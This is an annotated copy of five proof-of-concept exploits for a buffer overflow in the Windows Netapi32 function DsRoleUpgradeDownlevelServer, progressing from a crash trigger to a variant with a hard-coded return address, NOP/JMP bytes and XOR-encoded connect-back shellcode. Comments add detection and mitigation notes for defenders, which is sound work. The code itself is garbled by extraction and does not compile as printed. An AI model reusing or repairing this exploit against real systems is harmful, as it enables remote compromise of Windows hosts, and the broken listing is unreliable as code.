1.include
/*
 * Variant 1 of a crash proof-of-concept against the Netapi32 export
 * DsRoleUpgradeDownlevelServer.  The listing is extraction-garbled (case
 * folding, "/ n" for "\n", a truncated for-loop, missing header names) and
 * does not compile as printed; the code is kept byte-for-byte below and only
 * comments are added.
 *
 * Defender notes:
 *  - Host signal: a process loads Netapi32.dll, resolves
 *    DsRoleUpgradeDownlevelServer by name at runtime (GetProcAddress, so the
 *    static import table does not show it) and calls it with a ~10 KB
 *    wide-character argument whose low bytes are all 'a'.
 *  - NOTE(review): the page treats this call as an overflow trigger; the
 *    affected code presumably runs in the service that implements the call,
 *    not in this client process -- confirm against the vendor advisory
 *    (bulletin / CVE id is not given on this page).
 *  - Mitigation: apply the vendor update for this function and limit network
 *    reachability of the hosting service; a crash of that service after an
 *    oversized request is the incident-response indicator to look for.
 */
#include
// Header name lost in extraction; the code needs the Windows and C runtime
// headers for LoadLibrary/GetProcAddress, printf and memset.
#pragma Comment (Lib, "Netapi32.lib") # Pragma Comment (LIB, "WS2_32.LIB")
// Twelve pointer-sized arguments all declared as unsigned long: the PoC passes
// buffer addresses cast to unsigned long (see the call at the end) instead of
// the export's real prototype, which is not given on this page.
typedef int (_stdcall * DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long);
// Global function pointer, filled in by GetProcAddress in main (identifier
// case is garbled on this line).
DSRoleUpgradeDownLevelServer DSRoleUpGradedownLevelServer;
// maxlen counts 2-byte (UTF-16 style) slots: buf is 2*maxlen = 10000 bytes.
// buf2 (2000 bytes) is only filler handed to the remaining arguments.
#define maxlen 5000
Char BUF [2 * Maxlen]; Char BUF2 [2000];
// Entry point (non-standard "void main"): load Netapi32.dll, resolve the
// export by name, fill buf with a pattern and make a single call.
Void main (int Argc, char ** argv) {INT i;
// Runtime resolution of the target export; both failure paths print a message
// and return.  (The printf literals are garbled as printed.)
HMODULE hNetapi = LoadLibrary ( "Netapi32.dll"); if (hNetapi!) {Printf ( "Can not load Netapi32.dll ... / n"); return;} DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER) GetProcAddress (hNetapi, "DsRoleUpgradeDownlevelServer "); If (! DsroleUpgradedownlevelserver) {printf (" "can't get function dsroleupgradedownload"); Return;}
// As printed, the leading "//" swallows the memset and the for-header on the
// next line (extraction artefact); the loop bound is not recoverable here.
// unicode (xx 00 xx 00 xx 00) MEMSET (BUF, 0, Maxlen * 2); for (i = 0; i
// Low byte of each 2-byte slot set to 'a', then the call.  Which argument
// receives &buf is not recoverable from this garbled line (variants 4 and 5 on
// this page pass &buf as the first argument and &buf2 for the rest).
BUF [2 * i] = 'a'; DSRoleUpGradedownLvelServer (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], Unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [ 0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0]); return;}
2.
/*
 * Variant 2: same structure as variant 1 (load Netapi32.dll, resolve
 * DsRoleUpgradeDownlevelServer by name, call it with a ~10 KB wide-character
 * buffer), but the filler byte now depends on the slot index (i % 100 based;
 * the operator between "100" and "100" was lost in extraction) instead of a
 * constant 'a'.  Extraction-garbled and non-compiling as printed; kept
 * byte-for-byte, comments only.
 *
 * Defender notes: still a crash-style PoC with no payload.  The host signal is
 * unchanged -- runtime resolution of this export plus an oversized argument.
 * NOTE(review): the overflow presumably occurs in the service implementing
 * the call, not in this client -- confirm against the vendor advisory (no
 * bulletin / CVE id on this page).  Mitigation: vendor update for this
 * function; restrict network reachability of the hosting service.
 */
#include
#include
// Header names lost in extraction (Windows API + C runtime).
#pragma Comment (Lib, "Netapi32.lib") # Pragma Comment (LIB, "WS2_32.LIB")
// Twelve unsigned long arguments: the PoC passes buffer addresses cast to
// unsigned long rather than using the export's real prototype (not on page).
// The global pointer after the typedef is filled by GetProcAddress in main.
typedef int (_stdcall * DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
// maxlen counts 2-byte slots: buf is 2*maxlen = 10000 bytes; buf2 is filler.
#define maxlen 5000
Char BUF [2 * Maxlen]; Char BUF2 [2000];
// Entry point (non-standard "void main").
Void main (int Argc, char ** argv) {INT i;
// Runtime resolution of the export; both failure paths print and return.
HMODULE hNetapi = LoadLibrary ( "Netapi32.dll"); if (hNetapi!) {Printf ( "Can not load Netapi32.dll ... / n"); return;} DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER) GetProcAddress (hNetapi, "DsRoleUpgradeDownlevelServer "); If (! DsroleUpgradedownlevelserver) {printf (" "can't get function dsroleupgradedownload"); Return;}
// As printed, the "//" swallows the memset and the for-header; loop bound lost.
// unicode (xx 00 xx 00 xx 00) MEMSET (BUF, 0, Maxlen * 2); for (i = 0; i
// Index-dependent low byte per slot, then the call.  Which argument receives
// &buf is not recoverable from this garbled line (variants 4 and 5 on this
// page pass &buf first and &buf2 for the rest).
BUF [2 * I] = (char) (i% 100 100); DSRoleUpgradeDownLevelServer (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) ) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0] (Unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0]); return;}
3.
<!-- placeholder removed -->
/*
 * Variant 3: identical to variant 2 except that the per-slot filler byte is
 * derived from i / 100 (the operator before the trailing "100" was lost in
 * extraction).  Extraction-garbled and non-compiling as printed; kept
 * byte-for-byte, comments only.
 *
 * Defender notes: crash-style PoC, no payload.  Host signal: runtime
 * resolution of DsRoleUpgradeDownlevelServer plus a ~10 KB wide-character
 * argument.  NOTE(review): the overflow presumably occurs in the service
 * implementing the call, not in this client -- confirm against the vendor
 * advisory (no bulletin / CVE id on this page).  Mitigation: vendor update for
 * this function; restrict network reachability of the hosting service.
 */
#include
#include
// Header names lost in extraction (Windows API + C runtime).
#pragma Comment (Lib, "Netapi32.lib") # Pragma Comment (LIB, "WS2_32.LIB")
// Twelve unsigned long arguments (buffer addresses cast to unsigned long at
// the call); the global pointer is filled by GetProcAddress in main.
typedef int (_stdcall * DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
// maxlen counts 2-byte slots: buf is 2*maxlen = 10000 bytes; buf2 is filler.
#define maxlen 5000
Char BUF [2 * Maxlen]; Char BUF2 [2000];
// Entry point (non-standard "void main").
Void main (int Argc, char ** argv) {INT i;
// Runtime resolution of the export; both failure paths print and return.
HMODULE hNetapi = LoadLibrary ( "Netapi32.dll"); if (hNetapi!) {Printf ( "Can not load Netapi32.dll ... / n"); return;} DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER) GetProcAddress (hNetapi, "DsRoleUpgradeDownlevelServer "); If (! DsroleUpgradedownlevelserver) {printf (" "can't get function dsroleupgradedownload"); Return;}
// As printed, the "//" swallows the memset and the for-header; loop bound lost.
// unicode (xx 00 xx 00 xx 00) MEMSET (BUF, 0, Maxlen * 2); for (i = 0; i
// i/100-derived low byte per slot, then the call.  Which argument receives
// &buf is not recoverable from this garbled line (variants 4 and 5 on this
// page pass &buf first and &buf2 for the rest).
BUF [2 * I] = (char) (i / 100 100); DSRoleUpGradedownLevelServer (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) ) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0] (Unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0]); return;}
4.
/*
 * Variant 4: same filler as variant 3, plus four fixed bytes written into
 * slots 2844..2847 (the page's own comment gives the value 0x7FFA1571), and
 * &buf is now explicitly the first argument of the call.  Extraction-garbled
 * and non-compiling as printed; kept byte-for-byte, comments only.
 *
 * Defender notes:
 *  - Still no payload: this variant only places a fixed address into the
 *    oversized argument.  NOTE(review): a hard-coded address of this kind is
 *    presumably specific to one OS build, so the PoC is not expected to
 *    behave the same across versions -- unverified from this page.
 *  - Host signal unchanged: runtime resolution of
 *    DsRoleUpgradeDownlevelServer plus a ~10 KB wide-character argument; on
 *    the serving side, a crash of the hosting service after such a request.
 *  - Mitigation: vendor update for this function (bulletin / CVE id not on
 *    this page); restrict network reachability of the hosting service.
 */
#include
#include
// Header names lost in extraction (Windows API + C runtime).
#pragma Comment (Lib, "Netapi32.lib") # Pragma Comment (LIB, "WS2_32.LIB")
// Twelve unsigned long arguments (buffer addresses cast to unsigned long at
// the call); the global pointer is filled by GetProcAddress in main.
typedef int (_stdcall * DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
// maxlen counts 2-byte slots: buf is 2*maxlen = 10000 bytes; buf2 is filler.
#define maxlen 5000
Char BUF [2 * Maxlen]; Char BUF2 [2000];
// Entry point (non-standard "void main").
Void main (int Argc, char ** argv) {INT i;
// Runtime resolution of the export; both failure paths print and return.
HMODULE hNetapi = LoadLibrary ( "Netapi32.dll"); if (hNetapi!) {Printf ( "Can not load Netapi32.dll ... / n"); return;} DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER) GetProcAddress (hNetapi, "DsRoleUpgradeDownlevelServer "); If (! DsroleUpgradedownlevelserver) {printf (" "can't get function dsroleupgradedownload"); Return;}
// As printed, the "//" swallows the memset and the for-header; loop bound lost.
// unicode (xx 00 xx 00 xx 00) MEMSET (BUF, 0, Maxlen * 2); for (i = 0; i
// I/100-derived low byte per slot (loop body).
BUF [2 * I] = (char) (I / 100 100);
// The four assignments on the next line are inside a "//" comment as printed,
// i.e. not active in this text; the page's own comment gives the bytes and the
// 32-bit value they spell.
// = 2844 ~ 2847, VALUES 0x7FFA1571 BUF [2 * 2844] = 0x71; BUF [2 * 2845] = 0x15; BUF [2 * 2846] = 0xfa; buf [2 * 2847] = 0x7f;
// The call: &buf (10000 bytes) as the first argument, &buf2 for the other
// eleven, all cast to unsigned long.  Return value is ignored.
DsRoleUpgradeDownlevelServer ((unsigned long) & buf [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long ) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0] , (unsigned long) & buf2 [0]); Return;}
5.
/*
 * Variant 5, declarations part: same includes, typedef and buffers as the
 * earlier variants, plus two byte offsets into the shellcode array declared
 * further down (port_offset / ip_offset) where mshell writes the connect-back
 * port and address.  Extraction-garbled as printed; kept byte-for-byte,
 * comments only.
 *
 * Defender note: WS2_32.lib is linked for the htons/inet_addr calls in
 * mshell; the Netapi32 link and the runtime GetProcAddress are the same host
 * signal as in the crash-only variants.
 */
#include
#include
// Header names lost in extraction (Windows API, Winsock, C runtime).
#pragma Comment (Lib, "Netapi32.lib") # Pragma Comment (LIB, "WS2_32.LIB")
// Twelve unsigned long arguments (buffer addresses cast to unsigned long at
// the call); the global pointer is filled by GetProcAddress in main.
typedef int (_stdcall * DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
// maxlen counts 2-byte slots: buf is 2*maxlen = 10000 bytes; buf2 is filler.
#define maxlen 5000
Char BUF [2 * Maxlen]; Char BUF2 [2000];
// Byte offsets inside shellcode[] patched by mshell: 2 bytes of port at 118,
// 4 bytes of IPv4 address at 111.  (Two defines fused onto one line.)
#define port_offset 118 # define ip_offset 111
/*
 * Variant 5, code part: the connect-back payload, the helper that patches
 * host/port into it, and a main that builds the same oversized argument as
 * variant 4 (fixed address at slots 2844..2847, now also NOP/NOP/JMP bytes at
 * slots 2840..2843 per the page's comment) and calls the export, apparently in
 * a loop whose header is truncated.  Extraction-garbled ("/ xNN" instead of
 * "\xNN" escapes, fused lines, missing semicolon in mshell) and non-compiling
 * as printed; kept byte-for-byte, comments only.
 *
 * Defender notes:
 *  - The page states the payload connects back to the host:port given to
 *    mshell (here "127.0.0.1", "1111").  On a real target that would be an
 *    outbound connection from the process hosting the vulnerable function;
 *    egress filtering and alerting on unexpected outbound connections from
 *    that service are the reliable controls.
 *  - The port and address are XOR-masked with 0x99 bytes before being copied
 *    into the payload, so the literal host/port bytes do not appear in the
 *    request -- do not rely on matching an IP or port string to detect it.
 *  - NOTE(review): the many 0x99 bytes suggest the rest of the payload is
 *    encoded the same way, but no decoder is shown on this page -- unverified.
 *  - Mitigation: vendor update for this function (bulletin / CVE id not on
 *    this page); restrict network reachability of the hosting service.
 */
Char shellcode [] = "/ x33 / xc9 / x66 / xb9 / x25 / x01 / x80 / x34 / x0b / x99 / x05 / xfa" / XEB / X05 / XE8 / XEB / XFF / XFF / XFF "/ x70 / x99 / xc6 / xfd / x38 / xa9 / x12 / xd9 / x95 / x12" / x12 / x85 / x34 / x12 / xf1 / x91 / x12 / xc0 / x71 / x02 / x99 / x99 / x99 "" / x7b / x60 / xf1 / xaa / xab / x99 / x99 / xf1 / XEE / XEA / XAB / XC6 / XCD / x66 / x8f / x12 "" / x71 / xf3 / x9d / xc0 / x71 / x1b / x7b / x60 / x18 / x75 / x09 / x98 / x99 "" / x99 / xcd / xf1 / x98 / x98 / x99 / x99 / x66 / xcf / x89 / xc9 / xc9 / xc9 "" / xd9 / xc9 / x66 / xcf / x8d / x12 / x41 / xf1 / x9 / x99 / x99 / x98 / XF1 / X9B / X99 / X99 "" / xac / x12 / x55 / xf3 / x89 / xc8 / xca / x66 / xcf / x81 / x1c / x59 / XEC / XD3 / XF1 / XFA "" / XF4 / XFD / X99 / x10 / xf / xa9 / x1a / x75 / xcd / x14 / xa5 / xbd / xf3 / x8c / xc0 / x32 "" / x7b / x64 / x5f / xdd / xbd / x89 / xdd / x67 / xdd / xbd / xa4 / x10 / xc5 / xbd / xd1 / x10 "" / xc5 / xbd / xd5 / x10 / xc5 / XBD / XC9 / X14 / XDD / XBD / X89 / XCD / XC9 / XC8 / XC8 / XC8 "" "" "" "/ XF3 / X98 / XC8 / XC8 / X66 / XEF / XA9 / XC8 / X66 / XCF / X9D / X12 / X55 / XF3 / X66 / X66 "" "/ XA8 / X66 / XCF / X91 / XCA / X66 / XCF / X85 / X66 / XCF / x95 / xc8 / xcf / x12 / xdc / xa5 "" / x12 / xcd / xb1 / xe1 / x9a / x 4C / XCB / X12 / XEB / XB9 / X9A / X6C / XAA / X50 / XD0 / XD8 "" "" / x34 / x9a / x5c / xaa / x42 / x96 / x27 / x89 / xa3 / x4f / xed / x91 / x58 / X52 / x94 / x9a "" / x43 / xd9 / x72 / x68 / xa2 / x86 / x12 / xc3 / xbd / x9a / x44 / xd2 / x12 "" / x95 / xd2 / x12 / xc3 / X85 / X9A / X44 / X12 / X9D / X12 / XC7 / XC0 / X5A "" / x71 / x99 / x66 / x66 / x66 / x17 / xd7 / x97 / x75 / Xeb / x67 / x2a / X8F / X34 / X40 / X9C "" / x57 / x52 / x74 / x65 / x5 / x40 / x90 / x6c / x33 "/ xf9 / x7e / xe0 / X5F / XE0 "; void mshell (char * h, char * p) {unsigned short port; unsigned long ip;
// mshell body: port = htons(atoi(p)) ^ 0x9999, ip = inet_addr(h) ^ 0x99999999,
// both memcpy'd into shellcode[] at port_offset / ip_offset (closing brace of
// mshell and the start of main are fused onto this line as printed).
Port = HTONS (ATOI (P)) ^ (Ushort) 0x9999; IP = INET_ADDR (H) ^ (Ulong) 0x99999999; Memcpy (& shellcode [Port_Offset], & Port, 2); Memcpy (& shellcode [ip_offset], & ip, 4) } void main (int Argc, char ** argv) {INT i;
// Runtime resolution of the export; both failure paths print and return.
HMODULE hNetapi = LoadLibrary ( "Netapi32.dll"); if (hNetapi!) {Printf ( "Can not load Netapi32.dll ... / n"); return;} DsRoleUpgradeDownlevelServer = (DSROLEUPGRADEDOWNLEVELSERVER) GetProcAddress (hNetapi, "DsRoleUpgradeDownlevelServer "); If (! DsroleUpgradedownlevelserver) {printf (" "can't get function dsroleupgradedownload"); Return;}
// As printed, the "//" swallows the memset and the for-header; loop bound lost.
// unicode (xx 00 xx 00 xx 00) MEMSET (BUF, 0, Maxlen * 2); for (i = 0; i
// I/100-derived low byte per slot (loop body).
BUF [2 * I] = (char) (I / 100 100);
// The assignments on the next two lines are inside "//" comments as printed,
// i.e. not active in this text; the page's comments give the bytes placed at
// slots 2844..2847 (value 0x7FFA1571) and 2840..2843 (90 90 EB 04).
// = 2844 ~ 2847, VALUES 0x7FFA1571 BUF [2 * 2844] = 0x71; BUF [2 * 2845] = 0x15; BUF [2 * 2846] = 0xfa; buf [2 * 2847] = 0x7f;
// i = 2840 ~ 2843, NOP / NOP / JMP 4, VALUES 90 90 EB 04 BUF [2 * 2840] = 0x90; BUF [2 * 2841] = 0x90; BUF [2 * 2842] = 0XEB; BUF [2 * 2843] = 0x04;
// Patch the connect-back target into the payload; as written it points at
// the local host, port 1111.  Where the payload is copied into buf is not
// shown on this page.
Mshell ("127.0.0.1", "1111"); // Shellcode Connect Back to Port 1111
// The call (first argument &buf, the other eleven &buf2), preceded by a
// for-header whose condition was lost in extraction -- it is unclear from this
// text how many times the export is invoked.
For (i = 0; I DsRoleUpgradeDownlevelServer ((unsigned long) & buf [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long ) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0], (unsigned long) & buf2 [0] , (unsigned long) & buf2 [0]); Return;}